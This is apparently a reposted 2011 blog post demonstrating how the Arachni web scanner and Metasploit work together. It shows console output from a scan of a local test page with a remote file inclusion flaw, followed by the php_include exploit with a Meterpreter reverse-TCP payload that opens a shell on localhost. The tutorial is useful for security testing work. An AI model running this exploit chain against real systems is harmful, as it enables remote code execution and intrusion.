Friday, January 7, 2011

WebApp audit and exploitation with Arachni and Metasploit



regarding Arachni/Metasploit integration.
Arachni won’t replace WMAP, however lots of work will be put forward by the MSF team to make Arachni and the MSF able to play together.

Meaning that you’ll be able to save a new kind of Arachni report, currently called “ArachniMetareport”, and then load it using an MSF plug-in (or database importer, we’ll see).
However the functionality will be the following:

* You scan a website with Arachni
* You load the “ArachniMetareport” using Metasploit
* You choose one of the available exploits and payloads
* You PWN!

Arachni is already good to go, but a lot of work will need to go into Metasploit’s generic webapp modules to make them able to exploit a wide range of vulnerabilities and vectors.
Sadly, only very simple GET parameters can be exploited at the moment
with the new Metasploit Pro release which is also aimed towards webapp security.
here is an Arachni plug-in for the MSF as a proof-of-concept.



step 1 ) scan with anarchy


 $ ./arachni.rb -g --mods=simple_rfi http://127.0.0.2/~zapotek/tests/links/rfi.php --report=metareport --repsave=metasploit

Arachni - Web Application Security Scanner Framework v0.2 [0.1.7]
       Author: Tasos "Zapotek" Laskos
                                     
               (With the support of the community and the Arachni Team.)

       Website:       http://github.com/Zapotek/arachni
       Documentation: http://github.com/Zapotek/arachni/wiki[*] Initing...

 [-] [HTTP: 200] http://127.0.0.2/~zapotek/tests/links/rfi.php
 [-] SimpleRFI: Auditing link variable 'rfi' of http://127.0.0.2/~zapotek/tests/links/rfi.php
 [-] SimpleRFI: Auditing link variable 'rfi' of http://127.0.0.2/~zapotek/tests/links/rfi.php
 [-] SimpleRFI: Auditing link variable 'rfi' of http://127.0.0.2/~zapotek/tests/links/rfi.php
 [-] SimpleRFI: Auditing link variable 'rfi' of http://127.0.0.2/~zapotek/tests/links/rfi.php
 [-] Harvesting HTTP responses...
 [-] Depending on server responsiveness and network conditions this may take a while.
 [-] SimpleRFI: Analyzing response #1...
 [-] SimpleRFI: Analyzing response #3...
 [-] SimpleRFI: Analyzing response #0...
 [+] SimpleRFI: In link var 'rfi'  ( http://127.0.0.2/~zapotek/tests/links/rfi.php?d5053f4d0c42664c32cbbb266dbbbf7e85cb44b803de379448a1fceff6ae1204=&rfi=hTtP%3A%2F%2Fgoogle.com )
 [-] SimpleRFI: Analyzing response #2...
 [+] SimpleRFI: In link var 'rfi'  ( http://127.0.0.2/~zapotek/tests/links/rfi.php?d5053f4d0c42664c32cbbb266dbbbf7e85cb44b803de379448a1fceff6ae1204=&rfi=hTtP%3A%2F%2Fgoogle.com )

 [-] [HTTP: 200] http://127.0.0.2/~zapotek/tests/links/rfi.php?rfi=rfi
 [-] Harvesting HTTP responses...
 [~] Depending on server responsiveness and network conditions this may take a while.

 [~] Sent 4 requests.
 [~] Received and analyzed 4 responses.
 [~] In 00:00:00 ( 0.35381847 seconds ).
 [~] Average: 11 requests/second.

 [-] Creating file for the Metasploit framework.
 [-] Saved in 'metasploit.afr.msf'.

 [-] Dumping audit results in 'metasploit.afr'.
 [-] Done!

 [~] Sent 4 requests.
 [~] Received and analyzed 4 responses.
 [~] In 00:00:00 ( 0.35381847 seconds ).
 [~] Average: 11 requests/second.


Step 2: Load Metasploit


$ ./msfconsole

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|                                                                                                                                         

       =[ metasploit v3.5.0-dev [core:3.5 api:1.0]
+ -- --=[ 612 exploits - 306 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r10756 updated today (2010.10.19)

msf > load arachni
[-] Arachni plugin loaded.
[-] Successfully loaded plugin: Arachni
msf > arachni_load_metareport ../arachni/metasploit.afr.msf
[-] Loading report...

Available exploits:
  unix/webapp/php_include
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > set PAYLOAD php/meterpreter_reverse_tcp
PAYLOAD => php/meterpreter_reverse_tcp
msf exploit(php_include) > show options

Module options:

   Name      Current Setting                                                         Required  Description
   ----      ---------------                                                         --------  -----------
   PATH      /                                                                       yes       The base directory to prepend to the URL to try
   PHPRFIDB  /home/zapotek/workspace/metasploit/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI    /~zapotek/tests/links/rfi.php?rfi=XXpathXX                              no        The URI to request, with the include parameter changed to XXpathXX
   Proxies                                                                           no        Use a proxy chain
   RHOST     127.0.0.2                                                               yes       The target address
   RPORT     80                                                                      yes       The target port
   SRVHOST   127.0.0.2                                                               yes       The local host to listen on.
   SRVPORT   1212                                                                    yes       The local port to listen on.
   URIPATH                                                                           no        The URI to use for this exploit (default is random)
   VHOST                                                                             no        HTTP server virtual host

Payload options (php/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(php_include) > exploit

[-] Started reverse handler on 127.0.0.1:4444
[-] Using URL: http://127.0.0.2:1212/gPgbBVJU
[-] PHP include server started.
[_] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:47847) at 2010-10-20 06:22:21 +0100

meterpreter > ls

Listing: /home/zapotek/workspace/arachni/tests/links
====================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  304   fil   2010-10-06 20:07:00 +0100  redirect.php
100644/rw-r--r--  280   fil   2010-10-15 02:15:47 +0100  rfi.php
100644/rw-r--r--  958   fil   2010-10-12 22:41:23 +0100  sqli.php
100644/rw-r--r--  285   fil   2010-10-03 19:56:19 +0100  xss.php

meterpreter >


As you can see all datastore options have been set automatically, all you need to do is set your favourite payload and PWN!
This isn’t very impressive right now but in the near future you’ll be able to exploit very complex and hard to find vulnerabilities with virtually no hassle at all.

Including vulnerabilities ranging from simple link variables to convoluted HTTP header fields.

Put simply: Arachni will provide the context and Metasploit will provide the muscle.

What’s best is that all of this power will be available to anyone who needs it and for that you have to thank the beauty of Open Source software.

source = outlaws
posted by h2h3h4
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)